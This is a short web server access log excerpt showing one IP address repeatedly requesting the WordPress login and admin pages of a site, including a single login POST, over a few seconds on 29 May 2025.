196.251.87.44 - - [29/May/2025:00:23:03 -0400] "GET /wp-login.php?redirect_to=https%3A%2F%2Fclient.socialdigiinnovator.com%2Fwp-admin%2F&reauth=1 HTTP/1.1" 302 0 "www.google.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
196.251.87.44 - - [29/May/2025:00:23:06 -0400] "GET /404 HTTP/1.1" 404 8475 "https://client.socialdigiinnovator.com/wp-admin/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
196.251.87.44 - - [29/May/2025:00:23:06 -0400] "GET /wp-admin/ HTTP/1.1" 302 0 "www.google.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
196.251.87.44 - - [29/May/2025:00:23:07 -0400] "GET /wp-login.php?redirect_to=https%3A%2F%2Fclient.socialdigiinnovator.com%2Fwp-admin%2F&reauth=1 HTTP/1.1" 302 0 "www.google.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
196.251.87.44 - - [29/May/2025:00:23:04 -0400] "GET /404 HTTP/1.1" 404 8475 "www.google.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
196.251.87.44 - - [29/May/2025:00:23:05 -0400] "POST /wp-login.php HTTP/1.1" 302 0 "https://client.socialdigiinnovator.com/wp-admin/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
